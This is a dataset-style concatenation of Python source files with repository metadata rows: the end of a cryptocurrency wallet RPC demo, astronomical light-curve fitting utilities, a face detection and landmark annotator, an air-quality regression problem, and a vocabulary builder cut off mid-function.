'wallet_bin_path': 'wallets/monero-v0.12.2.0/monero-wallet-rpc',
'datastore_path': 'datastores/XMR',
'wallet_filename': 'your_XMR_wallet_name_here.dat',
'wallet_password': 'your_XMR_password_here',
'daemon_port': 37779, # For the default Monero client, the wallet has a separate server daemon
'rpcport': 37780
},
'ETH': {
'wallet_bin_path': '/usr/bin/parity',
'datastore_path': 'datastores/ETH',
'wallet_password': 'your_ETH_wallet_password_here'
}
}
def main():
mp = MasterPiggy(piggy_settings)
mp.start_servers()
logger.warning('#######################')
logger.warning('Calling RPC methods now')
logger.warning('#######################')
logger.warning('Balance: {}'.format(mp.get_balances()))
logger.warning('BTC Receive address: {}'.format(mp.get_receive_address('BTC')))
logger.warning("BTC transactions_since: \n{}".format(mp.transactions_since('BTC')))
logger.warning("BTC suggest_miner_fee: \n{}".format(mp.suggest_miner_fee('BTC')))
logger.warning('XMR Receive address: {}'.format(mp.get_receive_address('XMR')))
logger.warning("XMR transactions_since: \n{}".format(mp.transactions_since('XMR')))
logger.warning("XMR suggest_miner_fee: \n{}".format(mp.suggest_miner_fee('XMR')))
logger.warning('ETH Receive address: {}'.format(mp.get_receive_address('ETH')))
logger.warning("ETH transactions_since: \n{}".format(mp.transactions_since('ETH')))
logger.warning("ETH suggest_miner_fee: \n{}".format(mp.suggest_miner_fee('ETH')))
mp.stop_servers()
if __name__ == '__main__':
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.INFO)
main()
| 37.242991
| 103
| 0.684065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,753
| 0.690841
|
9ff624252765d2c5657956ad0fdec3d525d53544
| 22,024
|
py
|
Python
|
lcfit_utils.py
|
idekany/lcfit
|
4a0080fca981afe2b8974db8f5d3484c663b6c13
|
[
"MIT"
] | null | null | null |
lcfit_utils.py
|
idekany/lcfit
|
4a0080fca981afe2b8974db8f5d3484c663b6c13
|
[
"MIT"
] | null | null | null |
lcfit_utils.py
|
idekany/lcfit
|
4a0080fca981afe2b8974db8f5d3484c663b6c13
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
import os
import numpy as np
import fourier as ff
import matplotlib
import warnings
from matplotlib import pyplot as plt
from os.path import isfile
matplotlib.use('Agg')
def warn(*args, **kwargs):
print('WARNING: ', *args, file=sys.stderr, **kwargs)
def fit_validate_model(model, x: np.array, y: np.array, train_index, val_index, weights: np.array = None):
x_t, x_v = x[train_index], x[val_index]
y_t, y_v = y[train_index], y[val_index]
if weights is not None:
weights_t, weights_v = weights[train_index], weights[val_index]
else:
weights_t = None
weights_v = None
# print("y_train:")
# print(y_t)
model.fit(x_t, y_t, weights=weights_t)
yhat_v = model.predict(x_v)
return y_v, yhat_v, weights_v
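# Illustrative sketch (assumes a model object exposing fit(x, y, weights=...) and
# predict(x), plus a splitter such as sklearn.model_selection.KFold):
#   for train_idx, val_idx in KFold(n_splits=5).split(x):
#       y_val, yhat_val, w_val = fit_validate_model(model, x, y, train_idx, val_idx)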
def get_stratification_labels(data, n_folds):
"""
Create an array of stratification labels from an array of continuous values to be used in a stratified cross-
validation splitter.
:param data: list or numpy.ndarray
The input data array.
:param n_folds: int
The number of cross-validation folds to be used with the output labels.
:return: labels, numpy.ndarray
The array of integer stratification labels.
"""
    assert isinstance(data, (np.ndarray, list)), "data must be of type list or numpy.ndarray"
if isinstance(data, list):
data = np.array(data)
ndata = len(data)
isort = np.argsort(data) # Indices of sorted phases
labels = np.empty(ndata)
labels[isort] = np.arange(ndata) # Compute phase order
labels = np.floor(labels / n_folds) # compute phase labels for StratifiedKFold
    if np.min(np.bincount(labels.astype(int))) < n_folds:  # if the last label has too few elements, ...
        labels[labels == np.max(labels)] = np.max(
            labels) - 1  # ... then merge that label into the preceding one
return labels
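# Worked example (assumed, already-sorted input): with 10 values and n_folds=3,
# the phase ranks 0..9 give floor(rank / 3) = [0,0,0,1,1,1,2,2,2,3]; the lone
# trailing label 3 is merged into 2, so the result is [0,0,0,1,1,1,2,2,2,2].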
def write_results(pars, results: dict):
# check if the file already exists:
newfile = not isfile(os.path.join(pars.rootdir, pars.output_param_file))
with open(os.path.join(pars.rootdir, pars.output_param_file), 'a') as file:
if newfile:
# Write header:
if pars.compute_errors:
file.write('# id Nep period totamp A1 A2 A3 A1_e A2_e A3_e phi1 phi2 phi3 '
'phi1_e phi2_e phi3_e phi21 phi21_e phi31 phi31_e '
'meanmag meanmag_e cost aper phcov phcov2 snr ZPErr Npt order minmax')
else:
file.write('# id Nep period totamp A1 A2 A3 phi1 phi2 phi3 phi21 phi31 meanmag cost '
'aper phcov phcov2 snr ZPErr Npt order minmax')
if pars.feh_model_file is not None:
file.write(' FeH')
if pars.compute_errors:
file.write(' FeH_e')
if pars.pca_model_file is not None:
file.write(' E1 E2 E3 E4 E5 E6')
if pars.compute_errors:
file.write(' E1_e E2_e E3_e E4_e E5_e E6_e')
file.write('\n')
# ------------------------
if pars.compute_errors:
file.write(
"%s %4d %.6f %.3f %.3f %.3f %.3f %.3f %.3f %.3f %.3f %.3f %.3f %.3f %.3f %.3f %.4f %.4f %.3f %.3f "
"%.3f %.3f %.4f %d %.3f %.3f %.1f %.4f %4d %2d %.3f" %
(results['objname'], results['nepoch'], results['period'], results['tamp'],
results['A'][0], results['A'][1], results['A'][2],
results['A_std'][0], results['A_std'][1], results['A_std'][2],
results['Pha'][0], results['Pha'][1], results['Pha'][2],
results['Pha_std'][0], results['Pha_std'][1], results['Pha_std'][2],
results['phi21'], results['phi21_std'], results['phi31'], results['phi31_std'],
results['icept'], results['icept_std'], results['cost'], results['dataset'] + 1,
results['phcov'], results['phcov2'], results['snr'], results['totalzperr'],
results['ndata'], results['forder'], results['minmax']))
else:
file.write("%s %4d %.6f %.3f %.3f %.3f %.3f %.3f %.3f %.3f %.4f %.4f %.3f "
"%.4f %d %.3f %.3f %.1f %.4f %4d %2d %.3f" %
(results['objname'], results['nepoch'], results['period'], results['tamp'],
results['A'][0], results['A'][1], results['A'][2],
results['Pha'][0], results['Pha'][1], results['Pha'][2],
results['phi21'], results['phi31'],
results['icept'], results['cost'], results['dataset'] + 1,
results['phcov'], results['phcov2'], results['snr'], results['totalzperr'],
results['ndata'], results['forder'], results['minmax']))
if pars.feh_model_file is not None:
file.write(" %.3f" % results['feh'])
if pars.compute_errors:
file.write(" %.3f" % results['feh_std'])
if pars.pca_model_file is not None:
file.write(" %.6f %.6f %.6f %.6f %.6f %.6f" %
(results['pca_feat'][0], results['pca_feat'][1], results['pca_feat'][2],
results['pca_feat'][3], results['pca_feat'][4], results['pca_feat'][5]))
if pars.compute_errors:
file.write(" %.6f %.6f %.6f %.6f %.6f %.6f" %
(results['pca_feat_std'][0], results['pca_feat_std'][1], results['pca_feat_std'][2],
results['pca_feat_std'][3], results['pca_feat_std'][4], results['pca_feat_std'][5]))
file.write("\n")
def write_merged_datafile(pars, results: dict):
# check if the file already exists:
newfile = not isfile(os.path.join(pars.rootdir, pars.merged_output_datafile))
with open(os.path.join(pars.rootdir, pars.merged_output_datafile), 'a') as file:
if newfile:
file.write('# id time mag mag_err ZP_err\n')
outarr = np.rec.fromarrays((np.tile(results['objname'], results['ndata']),
results['otime'] + results['otime0'],
results['mag'], results['magerr'], results['zperr']))
np.savetxt(file, outarr, fmt='%s %.6f %.3f %.3f %.3f')
def write_single_datafile(pars, results: dict, phase_ext_neg=0, phase_ext_pos=1.2):
ophase_sorted, mag_sorted = extend_phases(results['ph'], results['mag'],
phase_ext_neg=phase_ext_neg, phase_ext_pos=phase_ext_pos, sort=True)
outarr = np.rec.fromarrays((ophase_sorted, mag_sorted), names=('phase', 'kmag'))
with open(os.path.join(pars.rootdir, pars.output_data_dir, results['objname'] + '.dat'), 'w') as file:
np.savetxt(file, outarr, fmt='%f %f')
if pars.fold_double_period:
ophase_sorted2, mag_sorted2 = extend_phases(results['ph_2p'], results['mag'],
phase_ext_neg=phase_ext_neg, phase_ext_pos=phase_ext_pos, sort=True)
outarr = np.rec.fromarrays((ophase_sorted2, mag_sorted2), names=('phase', 'kmag'))
with open(os.path.join(pars.rootdir, pars.output_data_dir, results['objname'] + '_2p.dat'), 'w') as file:
np.savetxt(file, outarr, fmt='%f %f')
def write_synthetic_data(pars, results: dict):
if pars.gpr_fit:
outarr = np.rec.fromarrays((results['phase_grid'], results['synmag_gpr'] - results['icept']))
np.savetxt(os.path.join(pars.rootdir, pars.output_syn_dir,
results['objname'] + "_gpr" + pars.syn_suffix + '.dat'),
outarr, fmt='%.4f %.4f')
if pars.n_augment_data is not None:
outarr = np.hstack((results['phase_grid'].reshape(-1, 1), (results['synmag_gpr']).reshape(-1, 1), results['synmag_gpa']))
np.savetxt(os.path.join(pars.rootdir, pars.output_syn_dir,
results['objname'] + "_gpr_aug" + pars.syn_suffix + '.dat'),
outarr, fmt='%7.4f ' * (pars.n_augment_data + 2))
else:
outarr = np.rec.fromarrays((results['phase_grid'], results['syn'] - results['icept']))
np.savetxt(os.path.join(pars.rootdir, pars.output_syn_dir,
results['objname'] + "_dff" + pars.syn_suffix + '.dat'),
outarr, fmt='%.4f %.4f')
def make_figures(pars, results: dict, constrain_yaxis_range=True,
minphase=0, maxphase=1.2, aspect_ratio=0.6, figformat: str = 'png'):
# Create phase diagram:
outfile = os.path.join(pars.rootdir, pars.plot_dir, results['objname'] + pars.plot_suffix + "." + figformat)
plottitle = results['objname']
# plottitle = None
# figtext = '$P = {0:.6f}$ , $N_F = {1}$ , ap = {2}'.format(results['period'],results['forder'],bestap+1)
# figtext = '$P = {0:.6f}$'.format(results['period'])
figtext = '$P = {0:.6f}$ , $S/N = {1:d}$'.format(results['period'], int(results['snr']))
data1 = np.vstack((results['ph_o'], results['mag_o'], results['magerr_o'])).T
data2 = np.vstack((results['ph'], results['mag'], results['magerr'])).T
if pars.fourier_from_gpr:
data3 = np.vstack((results['phase_grid'], results['synmag_gpr'])).T
else:
data3 = np.vstack((results['phase_grid'], results['syn'])).T
# labels = ("orig.", "clipped", "binned", "DFF")
if pars.gpr_fit and pars.plot_gpr:
data4 = np.vstack((results['phase_grid'], results['synmag_gpr'], results['sigma_gpr'])).T
plot_input = (data1, data2, data3, data4)
fillerr_index = (3,)
symbols = ('r.', 'b.', 'r-', 'b-')
else:
plot_input = (data1, data2, data3)
fillerr_index = ()
        symbols = ('r.', 'k.', 'r-')
plotlc(plot_input, symbols=symbols, fillerr_index=fillerr_index, figsave=pars.save_figures, outfile=outfile,
xlabel='phase', ylabel='$' + pars.waveband + '$ [mag.]', figtext=figtext, title=plottitle,
constrain_yaxis_range=constrain_yaxis_range, minphase=minphase, maxphase=maxphase,
aspect_ratio=aspect_ratio, figformat=figformat)
if pars.fold_double_period:
# Create phase diagram with double period:
outfile = os.path.join(pars.rootdir, pars.plot_dir, results['objname'] + pars.plot_suffix + "_2p." + figformat)
figtext = '$2P = {0:.6f}$'.format(results['period'] * 2, results['forder'], results['dataset'] + 1)
data1 = np.vstack(
(results['ph_o_2p'], results['mag_o'], np.sqrt(results['magerr_o'] ** 2 + results['zperr_o'] ** 2))).T
data2 = np.vstack(
(results['ph_2p'], results['mag'], np.sqrt(results['magerr'] ** 2 + results['zperr'] ** 2))).T
labels = ("orig.", "clipped")
plot_input = (data1, data2)
symbols = ('ro', 'ko')
plotlc(plot_input, symbols=symbols, fillerr_index=(), figsave=pars.save_figures, outfile=outfile,
xlabel='phase', ylabel='$' + pars.waveband + '$ [mag.]', figtext=figtext, title=results['objname'],
constrain_yaxis_range=True, figformat=figformat)
def read_input(fname: str, do_gls=False, known_columns=False):
"""
Reads the input list file with columns: object ID, [period, [dataset]]
:param fname: string, the name of the input file
:param do_gls: boolean, whether to perform GLS on the input time series. If False, the second column of the input
file must contain the period.
:param known_columns: boolean; whether the dataset to be used is known. If True, the last column of the input
file must contain the number of the column.
    :return: ndarray(s) or None(s); 1-d arrays with the object IDs, periods, and datasets
"""
dtypes = ['|S25'] # dtype for first column: identifiers
if do_gls:
if known_columns:
usecols = (0, 1)
dtypes = dtypes + ['i']
else:
usecols = (0,)
else:
if known_columns:
usecols = (0, 1, 2)
dtypes = dtypes + ['f8'] + ['i']
else:
usecols = (0, 1)
dtypes = dtypes + ['f8']
arr = np.genfromtxt(fname, usecols=usecols,
dtype=dtypes, unpack=False, comments='#', filling_values=np.nan, names=True)
object_id = arr['id'].reshape(-1, ).astype(str)
if do_gls:
object_per = None
else:
object_per = arr['period'].reshape(-1, )
if known_columns:
object_ap = arr['ap'].reshape(-1, )
else:
object_ap = None
return object_id, object_per, object_ap
def read_lc(lcfile, n_data_cols: int = 1, is_err_col: bool = False, flag_column: bool = False,
snr_column: bool = False, is_zperr_col: bool = False, missing_values="NaN", invalid_raise=False):
assert n_data_cols > 0, "`n_datasets` must be non-zero integer"
colnames = ['otime']
dtypes = [float]
ncols = 1
for ii in range(n_data_cols):
colnames.append('mag' + str(ii+1))
dtypes.append(float)
ncols += 1
if is_err_col:
# We expect the column following each magnitude column to contain the magnitude uncertainty
colnames.append('magerr' + str(ii + 1))
dtypes.append(float)
ncols += 1
if is_zperr_col:
# The last column is expected to contain the zero-point error:
colnames.append('zperr' + str(ii + 1))
dtypes.append(float)
ncols += 1
if snr_column:
# We expect the next column to contain the S/N
colnames.append('snr' + str(ii + 1))
dtypes.append(float)
ncols += 1
if flag_column:
# We expect the next column to contain the flag
colnames.append('flag' + str(ii + 1))
dtypes.append('|S10')
ncols += 1
used_cols = list(range(ncols))
# Read light curve:
lcdatain = np.genfromtxt(lcfile, unpack=False, comments='#', filling_values=np.nan,
dtype=dtypes, usecols=used_cols, missing_values=missing_values,
names=colnames, invalid_raise=invalid_raise)
print(lcfile + " found.")
lcdatain = lcdatain[~np.isnan(lcdatain['otime'])]
return lcdatain
def degrade_lc(otime, mag, magerr, zperr, period=1.0, remove_points=True, nkeep=50,
min_otime=None, max_otime=None,
add_noise=False, sigma_noise=0.05,
add_phasegap=False, gap_pos=None, gap_length=0.1,
add_outliers=False, sigma_outliers=0.1, frac_outliers=0.1,
verbose=False):
if min_otime is not None:
mask = (otime > min_otime)
otime, mag, magerr, zperr = otime[mask], mag[mask], magerr[mask], zperr[mask]
if max_otime is not None:
mask = (otime < max_otime)
otime, mag, magerr, zperr = otime[mask], mag[mask], magerr[mask], zperr[mask]
if add_phasegap:
if gap_pos is None:
# Make the phasegap's position random betwen 0 and 1:
gap_pos = np.random.random()
pha = ff.get_phases(period, otime, epoch=0.0, shift=0.0, all_positive=True)
if gap_pos + gap_length > 1:
not_gap_inds = [(pha < gap_pos) & (pha > (gap_pos - 1 + gap_length))]
else:
not_gap_inds = [(pha < gap_pos) | (pha > (gap_pos + gap_length))]
mag = mag[not_gap_inds]
otime = otime[not_gap_inds]
magerr = magerr[not_gap_inds]
zperr = zperr[not_gap_inds]
if verbose:
print("N_data = {} (after phase gap added)".format(len(mag)))
if remove_points:
nremove = len(mag) - nkeep
if nremove > 0:
rem_inds = np.random.choice(range(len(mag)), size=nremove, replace=False)
otime = np.delete(otime, rem_inds)
mag = np.delete(mag, rem_inds)
magerr = np.delete(magerr, rem_inds)
zperr = np.delete(zperr, rem_inds)
if verbose:
print("N_data = {} (after points removed)".format(len(mag)))
out_inds = np.array([])
if add_outliers:
out_inds = np.random.choice(range(len(mag)), size=int(len(mag) * frac_outliers), replace=False)
mag[out_inds] = np.random.normal(mag[out_inds], sigma_outliers)
if verbose:
print("{} %% of points made outliers with sigma = {}".format(frac_outliers * 100.0, sigma_outliers))
if add_noise:
        mag = np.random.normal(mag, sigma_noise)  # perturb magnitudes with Gaussian noise of width sigma_noise
magerr = magerr + sigma_noise
return otime, mag, magerr, zperr, out_inds
def plotlc(datasets, symbols=(), labels=(), fillerr_index=(), title=None, figtext="",
minphase=-0.05, maxphase=2.05, figsave=False, outfile=None, invert_y_axis=True,
constrain_yaxis_range=False, xlabel='phase', ylabel='magnitude', aspect_ratio=0.6, figformat="png"):
capsize = 1 # size of the error cap
assert type(datasets) is tuple, "Error: expected tuple for argument, got {}".format(type(datasets))
assert type(symbols) is tuple, "Error: expected tuple for argument, got {}".format(type(symbols))
assert (type(labels) is tuple), "Error: expected tuple for argument, got {}".format(type(labels))
assert (type(figtext) is str), "Error: expected string for argument, got {}".format(type(figtext))
# Check if there is a title, if yes, adjust plot to make it fit and write it.
fig = plt.figure(figsize=(6, 6 * aspect_ratio))
if title is not None:
if len(labels) > 0:
fig.subplots_adjust(bottom=0.15, top=0.80, hspace=0.3, left=0.12, right=0.98, wspace=0)
else:
fig.subplots_adjust(bottom=0.15, top=0.88, hspace=0.3, left=0.12, right=0.98, wspace=0)
fig.suptitle('%s' % title, fontsize=12, fontweight='bold')
else:
if len(labels) > 0:
fig.subplots_adjust(bottom=0.15, top=0.88, hspace=0.3, left=0.12, right=0.98, wspace=0)
else:
fig.subplots_adjust(bottom=0.15, top=0.95, hspace=0.3, left=0.12, right=0.98, wspace=0)
ax = fig.add_subplot(111, facecolor='#FFFFEC')
nsymbols = len(symbols)
nlabels = len(labels)
# Iterate over the 'datasets' tuple:
for item, dataset in enumerate(datasets):
# assert(type(dataset) is ndarray)
if dataset.shape[0] < 1: # check if dataset is empty
continue
ncols = dataset.shape[1]
assert ncols > 1 # check if there are at least 2 columns
phase = dataset[:, 0]
mag = dataset[:, 1]
if ncols > 2:
magerr = dataset[:, 2]
else:
magerr = None
if nsymbols > item:
symbol = symbols[item]
color = None
else:
symbol = 'o'
color = next(ax._get_lines.prop_cycler)['color']
if nlabels > item:
label = labels[item]
else:
label = None
if item in fillerr_index:
with warnings.catch_warnings():
warnings.simplefilter('ignore')
base, = ax.plot(phase, mag, symbol, label=label, color=color, zorder=48)
# Shade the 95% credible interval around the optimal solution.
ax.fill(np.concatenate([phase.ravel(), phase.ravel()[::-1]]),
np.concatenate([mag.ravel() - 1.9600 * magerr,
(mag.ravel() + 1.9600 * magerr)[::-1]]),
alpha=.4, fc=base.get_color(), ec='None', zorder=70)
else:
ax.errorbar(phase, mag, yerr=magerr, fmt=symbol, label=label, capsize=capsize, color=color)
if maxphase > 1:
ax.errorbar(phase + 1, mag, yerr=magerr, fmt=symbol, capsize=capsize, color=color)
if nlabels > 0:
plt.legend(fontsize=8, loc='upper center', bbox_to_anchor=(0.5, 1.20),
ncol=4, fancybox=True, shadow=False)
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
if len(figtext) > 0:
ax.text(0.05, 1.02, "%s" % figtext, ha='left', va='top', bbox=dict(boxstyle='round', ec='k', fc='w'),
transform=ax.transAxes)
plt.xlim(minphase, maxphase)
if constrain_yaxis_range:
        # The y-axis range will be optimized for the magnitudes in datasets[1][:, 1].
# print(datasets[1][1])
minmag = np.min(datasets[1][:, 1])
maxmag = np.max(datasets[1][:, 1])
magrange = maxmag - minmag
ax.set_ylim(minmag - magrange / 5., maxmag + magrange / 5.)
if invert_y_axis:
plt.gca().invert_yaxis()
# plt.tight_layout()
if figsave and (outfile is not None):
fig.savefig(outfile, format=figformat)
plt.close(fig)
else:
fig.show()
return None
def extend_phases(p, y, phase_ext_neg=0.0, phase_ext_pos=0.0, sort=False):
"""
Extend a phase and a corresponding data vector in phase.
"""
# Extend data vectors in phase:
neg_ext_mask = (p - 1 > phase_ext_neg) # select phases in negative direction
pos_ext_mask = (p + 1 < phase_ext_pos) # select phases in positive direction
# Compose new data vectors according to extended phases:
p_ext = np.hstack((p[neg_ext_mask] - 1, p, p[pos_ext_mask] + 1))
y_ext = np.hstack((y[neg_ext_mask], y, y[pos_ext_mask]))
# magerr_ext=np.hstack((results['magerr_binned'][neg_ext_mask], results['magerr_binned'],
# results['magerr_binned'][pos_ext_mask]))
if sort:
# Sort data according to observed phases:
indx = np.argsort(p_ext) # indices of sorted ophase
p_ext_sorted = p_ext[indx]
y_ext_sorted = y_ext[indx]
return p_ext_sorted, y_ext_sorted
else:
return p_ext, y_ext
def smolec_feh(period, phi31, amp2):
    """Empirical [Fe/H] estimate from the pulsation period, the Fourier phase
    difference phi31 and the Fourier amplitude A2 (Smolec calibration)."""
    return -6.125 - 4.795 * period + 1.181 * phi31 + 7.876 * amp2
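# Hypothetical usage sketch (not part of the original module): illustrates
# extend_phases on a small toy folded light curve; numpy is already imported
# as np earlier in this module.
if __name__ == "__main__":
    p_demo = np.array([0.05, 0.45, 0.95])
    y_demo = np.array([10.2, 10.8, 10.3])
    # Extend the folded curve to the range [-0.2, 1.2] and sort by phase.
    p_ext, y_ext = extend_phases(p_demo, y_demo, phase_ext_neg=-0.2,
                                 phase_ext_pos=1.2, sort=True)
    print(p_ext)  # [-0.05  0.05  0.45  0.95  1.05]
    print(y_ext)  # [10.3  10.2  10.8  10.3  10.2]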
| 42.517375
| 133
| 0.582047
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 5,534
| 0.251271
|
9ff65d9e76edd0a7d15ce5ca32d68a653fd8c1bc
| 2,939
|
py
|
Python
|
facetool/annotator.py
|
yliess86/FaceTool
|
f93c511e9868b4555225750efbac2228a00fea00
|
[
"MIT"
] | 4
|
2020-05-03T01:29:23.000Z
|
2020-07-15T08:13:05.000Z
|
facetool/annotator.py
|
yliess86/FaceTool
|
f93c511e9868b4555225750efbac2228a00fea00
|
[
"MIT"
] | 3
|
2020-04-30T01:18:02.000Z
|
2020-05-01T14:52:11.000Z
|
facetool/annotator.py
|
yliess86/FaceCrop
|
f93c511e9868b4555225750efbac2228a00fea00
|
[
"MIT"
] | 1
|
2020-05-16T21:27:24.000Z
|
2020-05-16T21:27:24.000Z
|
# -*- coding: utf-8 -*-
"""facetool.annotator
The files provides a Face Annotator in charge of combining the result of the
Face Detector and Face Landmark in a single pandas DataFrame. This Face
Annotator is the API built to be used by the end user.
"""
from facetool.detector import FaceDetector
from facetool.landmarker import FaceLandmarker
from tqdm import tqdm
from typing import Tuple
import numpy as np
import pandas as pd
class FaceAnnotator:
"""Face Annotator
Face Annotator combine the boxes of a Face Detector and the landmarks of a
Face Landmarker in a single DataFrame that can later be used for analysis,
further computation, or visualization.
Arguments:
dbatch_size {int} -- batch size for the detector inference
lbatch_size {int} -- batch size for the landmarker frame loading
size {Tuple[int, int]} -- resize frames for detector
n_process {int} -- number of threads used by the landmarker
device {str} -- device to run the detector on ("cpu" or "cuda")
"""
def __init__(
self, dbatch_size: int, lbatch_size: int, size: Tuple[int, int],
n_process: int, device: str,
) -> None:
self.detector = FaceDetector(device, dbatch_size, size)
self.landmarker = FaceLandmarker(n_process, lbatch_size)
def __call__(self, path: str) -> pd.DataFrame:
"""Call
Combines boxes and landmarks in a single DataFrame.
Arguments:
path {str} -- path to the video to be annotated
Returns:
            pd.DataFrame -- dataframe containing box and landmark
                information of size [N, 1 + 4 + 68 * 2] where:
                * N -> valid frames (frames with a face detected)
* 1 -> frame_idx
* 4 -> box_x, box_y, box_w, box_h
* 68 * 2 -> landmark_i_x, landmark_i_y for i in range(68)
"""
boxes = self.detector(path)
landmarks = self.landmarker(path, boxes)
        N, B = boxes.shape  # Frames x Box Data
N, L, P = landmarks.shape # Frames x Landmark x Coords
# Combine Data
data = np.zeros((N, B + L * P), dtype=int)
pbar = tqdm(enumerate(zip(boxes, landmarks)), desc="Face Annotator")
for i, (box, landmark) in pbar:
data[i, 0:(4 + 1)] = box # t, x, y, w, h -> 5
data[i, 5::2] = landmark[:, 0] # x_0 .... x_68 -> 68
data[i, 6::2] = landmark[:, 1] # y_0 .... y_68 -> 68
# Helpers to Name Landmarks Columns
lpos = lambda k: "x" if k == 0 else "y"
lname = lambda j, k: f"landmark_{j + 1}_{lpos(k)}"
# Landmarks Column Names
names = ["frame_idx", "box_x", "box_y", "box_w", "box_h"]
names += [lname(j, k) for j in range(L) for k in range(P)]
# Create DataFrame
df = pd.DataFrame(data=data, columns=names)
return df
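# Hypothetical usage sketch (not part of the original module): the video path,
# batch sizes and frame size below are placeholders, and running this for real
# requires the FaceDetector / FaceLandmarker model weights to be available.
if __name__ == "__main__":
    annotator = FaceAnnotator(dbatch_size=32, lbatch_size=8,
                              size=(640, 360), n_process=4, device="cpu")
    df = annotator("video.mp4")  # placeholder path to a local video
    # One row per annotated frame: frame_idx, box_*, then 68 (x, y) landmarks.
    print(df[["frame_idx", "box_x", "box_y", "box_w", "box_h"]].head())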
| 36.7375
| 78
| 0.600204
| 2,504
| 0.85199
| 0
| 0
| 0
| 0
| 0
| 0
| 1,681
| 0.571963
|
9ff7ddf37d375ebc0e9b1af36cfd6f7f85ab8e18
| 1,338
|
py
|
Python
|
pygrn/problems/air_quality.py
|
nico1as/pyGRN
|
115d9d42dfbd374fc64393cabefb2a8e245aa6b7
|
[
"Apache-2.0"
] | 7
|
2018-07-18T16:08:51.000Z
|
2020-12-09T07:18:35.000Z
|
pygrn/problems/air_quality.py
|
nico1as/pyGRN
|
115d9d42dfbd374fc64393cabefb2a8e245aa6b7
|
[
"Apache-2.0"
] | 3
|
2018-04-13T11:44:59.000Z
|
2018-04-19T13:58:06.000Z
|
pygrn/problems/air_quality.py
|
nico1as/pyGRN
|
115d9d42dfbd374fc64393cabefb2a8e245aa6b7
|
[
"Apache-2.0"
] | 6
|
2018-07-22T01:54:14.000Z
|
2021-08-04T16:01:38.000Z
|
from __future__ import print_function
import numpy as np
import os
from datetime import datetime
from pygrn.problems import TimeRegression
class AirQuality(TimeRegression):
def __init__(self, namestr=datetime.now().isoformat(), learn=True,
epochs=1, root_dir='./', lamarckian=False):
data_file = os.path.join(root_dir, 'data/normalized_air_quality.csv')
all_dat = np.genfromtxt(data_file, delimiter=',')
        winsize = 5
        data = all_dat[:, 1:]          # features: every column except the target
        labels = all_dat[winsize:, 0]  # target: first column, winsize steps ahead
        # Stack winsize consecutive time steps side by side to form each input window.
        windowed = data[:-winsize, :]
        for i in range(1, winsize):
            windowed = np.concatenate((windowed, data[i:-(winsize-i), :]),
                                      axis=1)
        # First three quarters of the windows are used for training, the rest for testing.
        num_train = int(3*np.floor(windowed.shape[0]/4))
self.x_train = windowed[:num_train, :]
self.x_test = windowed[num_train:, :]
self.y_train = labels[:num_train]
self.y_test = labels[num_train:]
self.batch_size = 30
self.epochs = epochs
self.learn = learn
self.generation = 0
self.error = 0.1
self.error_decrease = 0.9
self.lamarckian = lamarckian
self.nin = data.shape[1]
self.nout = 1
self.cacheable = False
self.logfile = os.path.join(root_dir, 'logs/air_' + namestr + '.log')
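# Minimal sketch (not part of the original class) showing what the windowing in
# __init__ produces, on a toy one-feature series so it runs without the data file.
if __name__ == "__main__":
    toy = np.arange(8, dtype=float).reshape(8, 1)
    winsize = 3
    windowed = toy[:-winsize, :]
    for i in range(1, winsize):
        windowed = np.concatenate((windowed, toy[i:-(winsize - i), :]), axis=1)
    targets = toy[winsize:, 0]
    print(windowed)  # rows [0 1 2], [1 2 3], ..., [4 5 6]
    print(targets)   # [3. 4. 5. 6. 7.]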
| 31.857143
| 77
| 0.595665
| 1,196
| 0.893871
| 0
| 0
| 0
| 0
| 0
| 0
| 57
| 0.042601
|
9ff867269ebc563da12e37b56fdbdcb6807b0b80
| 3,572
|
py
|
Python
|
vocabulary.py
|
retrieva/python_stm
|
862e63e6f03b326cb036b1136dead280c42b9da8
|
[
"MIT"
] | 11
|
2020-02-07T05:26:08.000Z
|
2021-11-27T09:51:24.000Z
|
vocabulary.py
|
retrieva/python_stm
|
862e63e6f03b326cb036b1136dead280c42b9da8
|
[
"MIT"
] | null | null | null |
vocabulary.py
|
retrieva/python_stm
|
862e63e6f03b326cb036b1136dead280c42b9da8
|
[
"MIT"
] | 1
|
2020-02-10T02:44:37.000Z
|
2020-02-10T02:44:37.000Z
|
# This code is available under the MIT License.
# (c)2010-2011 Nakatani Shuyo / Cybozu Labs Inc.
# (c)2018-2019 Hiroki Iida / Retrieva Inc.
import nltk
import re
import MeCab
stopwords_list = nltk.corpus.stopwords.words('english')
recover_list = {"wa":"was", "ha":"has"}
wl = nltk.WordNetLemmatizer()
def load_corpus(ranges):
"""
load data from corpus
"""
tmp = re.match(r'(\d+):(\d+)$', ranges)
if tmp:
start = int(tmp.group(1))
end = int(tmp.group(2))
from nltk.corpus import brown as corpus
return [corpus.words(fileid) for fileid in corpus.fileids()[start:end]]
def load_dataframe(documents):
corpus = []
for doc in documents:
sentences = re.findall(r'\w+(?:\'\w+)?', doc)
if len(sentences) > 0:
corpus.append(sentences)
return corpus
def load_dataframe_jp(documents):
corpus = []
tagger = MeCab.Tagger('-O wakati')
tagger.parse("")
for doc in documents:
tokens = tagger.parse(doc.strip()).split()
corpus.append(tokens)
return corpus
def load_file(filename):
"""
    Load a corpus from a single file where each line corresponds to one document.
"""
corpus = []
f = open(filename, 'r')
for line in f:
doc = re.findall(r'\w+(?:\'\w+)?', line)
if len(doc) > 0:
corpus.append(doc)
f.close()
return corpus
def is_stopword(w):
return w in stopwords_list
def lemmatize(w0):
w = wl.lemmatize(w0.lower())
if w in recover_list: return recover_list[w]
return w
class Vocabulary:
def __init__(self, excluds_stopwords=False):
self.vocas = [] # id to word
self.vocas_id = dict() # word to id
self.docfreq = [] # id to document frequency
self.excluds_stopwords = excluds_stopwords
def term_to_id(self, term0):
term = lemmatize(term0)
if self.excluds_stopwords and is_stopword(term):
return None
if term not in self.vocas_id:
voca_id = len(self.vocas)
self.vocas_id[term] = voca_id
self.vocas.append(term)
self.docfreq.append(0)
else:
voca_id = self.vocas_id[term]
return voca_id
def doc_to_ids(self, doc):
ids_list = []
words = dict()
for term in doc:
id = self.term_to_id(term)
if id is not None:
ids_list.append(id)
if id not in words:
words[id] = 1
self.docfreq[id] += 1
if "close" in dir(doc):
doc.close()
return ids_list
def cut_low_freq(self, corpus, threshold=1):
new_vocas = []
new_docfreq = []
self.vocas_id = dict()
conv_map = dict()
